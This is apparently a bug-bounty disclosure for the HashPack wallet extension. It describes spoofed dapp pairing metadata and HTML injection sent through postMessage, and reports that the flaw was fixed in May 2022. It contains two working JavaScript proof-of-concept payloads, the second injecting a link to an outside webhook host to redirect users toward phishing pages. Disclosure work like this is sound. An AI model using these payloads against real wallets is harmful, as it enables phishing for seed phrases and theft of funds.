Hashpack vulnerability can induce victims to accept fake dapps & redirect to other websites

When some dapp send a postMessage to connect in the hashpack wallet the postMessage look like this:

1
{"type":"hashconnect-connect-extension","pairingString":"eyJtZXRhZGF0YSI6eyJuYW1lIjoiZEFwcCBFeGFtcGxlIiwiZGVzY3JpcHRpb24iOiJBbiBleGFtcGxlIGhlZGVyYSBkQXBwIiwiaWNvbiI6Imh0dHBzOi8vd3d3Lmhhc2hwYWNrLmFwcC9pbWcvbG9nby5zdmciLCJwdWJsaWNLZXkiOiI4OGU4YjE0NC1jOGQ1LTRmMTctODdhNi03YTZhNmY3NGRhNWQiLCJ1cmwiOiJodHRwcyYjNTg7JiM0NzsmIzQ3O2hhc2hwYWNrLmdpdGh1Yi5pbyJ9LCJ0b3BpYyI6ImY3ZTg4NDVjLTI1Y2UtNDAyZS04MzBjLTZlZTc2ZWZiMWE2NyIsIm5ldHdvcmsiOiJ0ZXN0bmV0IiwibXVsdGlBY2NvdW50Ijp0cnVlfQ=="}

decoding the base64:

1
{"metadata":{"name":"dApp Example","description":"An example hedera dApp","icon":"https://www.hashpack.app/img/logo.svg","publicKey":"88e8b144-c8d5-4f17-87a6-7a6a6f74da5d","url":"https://hashpack.github.io"},"topic":"f7e8845c-25ce-402e-830c-6ee76efb1a67","network":"testnet","multiAccount":true}

So, name, description, icon and url can be exchanged for other values, the thing is that any dapp, in any url in the browser can trick a user to think that is a offical dapp. Other wallets use the origin of the postMessage to proof the validity of the dapp. So, the wallet will show the origin URL of the dapp, otherwise an attacker can do this:

full PoC:

1
2
3
4
5
6
js=`{"metadata":{"name":"hashpack official dapp","description":"this is a official hashpack dapp, dont trust in other dapps","icon":"https://uploads-ssl.webflow.com/61ce2e4bcaa2660da2bb419e/61cf5cc71c9324950d7e071d_logo-colour-white.svg","publicKey":"db1cc1e2-db77-4ee3-b373-cbca344f771f","url":"connect to unlock new functionalities"},"topic":"150d2a18-bec6-4d55-9589-354bed842e3e","network":"testnet","multiAccount":true}`;

postMessage({
"type":"hashconnect-connect-extension",
"pairingString":btoa(js)
},'*');

Other thing that happens in this hashpack wallet, that actually can be more dangerous is that url parameter accept any link (<a href=https://example.com>click here</a>) and doesn’t add the target=_blank in this links so, if the user click in this link the window of the browser extension will be redirected to https://example.com that can have a fake form to the user make a login or something dangerous for his wallet, even a fake page asking the user for their seed.

full PoC:

1
2
3
4
5
6
js=`{"metadata":{"name":"hashpack official dapp","description":"this is a official hashpack dapp, dont trust in other dapps","icon":"https://uploads-ssl.webflow.com/61ce2e4bcaa2660da2bb419e/61cf5cc71c9324950d7e071d_logo-colour-white.svg","publicKey":"db1cc1e2-db77-4ee3-b373-cbca344f771f","url":"<a href='https://webhook.site/1cc29a42-d511-44f5-a545-a78832f5956d'>click here</a> to unlock new functionalities"},"topic":"150d2a18-bec6-4d55-9589-354bed842e3e","network":"testnet","multiAccount":true}`;

postMessage({
"type":"hashconnect-connect-extension",
"pairingString":btoa(js)
},'*');

after click in click here:

This is basically a html injection, however for wallets this can be dangerous since a user may be dealing with high values within their wallet and vulnerabilities like this may compromise their funds and anonymity

Timeline

  • 09/05/2022 - reported the vulnerability
  • 14/05/2022 - awarded the bounty
  • 29/05/2022 - the hashpack team have fixed the vulnerability